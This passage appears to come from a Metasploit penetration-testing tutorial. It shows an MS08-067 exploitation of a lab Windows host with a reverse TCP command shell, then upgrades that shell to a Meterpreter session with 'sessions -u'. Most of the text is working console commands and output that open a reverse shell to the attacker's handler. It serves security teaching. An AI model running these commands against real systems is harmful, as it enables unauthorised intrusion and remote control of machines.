One of the newer features in the Metasploit Framework is its ability to upgrade a command shell payload to a Meterpreter payload once the system has been exploited, by issuing the sessions -u
command. This is useful if we use a command shell payload as an initial stager and then find that this newly exploited system would make the perfect launching pad for further attacks into the network. Let’s look at a quick example from start to finish using MS08-067 with a reverse command shell as the payload, and upgrade it to a Meterpreter shell.
root@bt:/opt/framework3/msf3#msfconsole
msf >search ms08_067
[*] Searching loaded modules for pattern 'ms08_067'... Exploits ======== Name Rank Description ---- ---- ----------- windows/smb/ms08_067_netapi great Microsoft Server Service Relative Path Stack Corruption msf >use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >set PAYLOAD windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp msf exploit(ms08_067_netapi) >set TARGET 3
target => 3 msf exploit(ms08_067_netapi) >setg LHOST 192.168.33.129
LHOST => 192.168.33.129 msf exploit(ms08_067_netapi) >setg LPORT 8080
LPORT => 8080 msf exploit(ms08_067_netapi) >exploit -z
[*] Started reverse handler on 192.168.33.129:8080 [*] Triggering the vulnerability... [*] Sending stage (240 bytes) [*] Command shell session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1032) [*] Session 1 created in the background. msf exploit(ms08_067_netapi) >sessions -u 1
[*] Started reverse handler on 192.168.33.129:8080 [*] Starting the payload handler... [*] Command Stager progress - 3.16% done (1694/53587 bytes) [*] Command Stager progress - 6.32% done (3388/53587 bytes). . . SNIP . . .
[*] Command Stager progress - 97.99% done (52510/53587 bytes) [*] Sending stage (748032 bytes) msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.33.129:8080 -> 192.168.33.130:1044) msf exploit(ms08_067_netapi) >sessions -i 2
[*] Starting interaction with 2... meterpreter >
At we issue the setg
command for LHOST
and LPORT
, which is required in order for the sessions -u 1
to upgrade to Meterpreter at . (The setg
command sets the LPORT
and LHOST
globally in Metasploit, not just for this exploit.)
Notice at that when we exploit the system we issue the exploit -z
command, which will not interact with the session once the target has been exploited. If you had already executed the exploit
command at this point, you could simply press ctrl-Z and run the session in the background.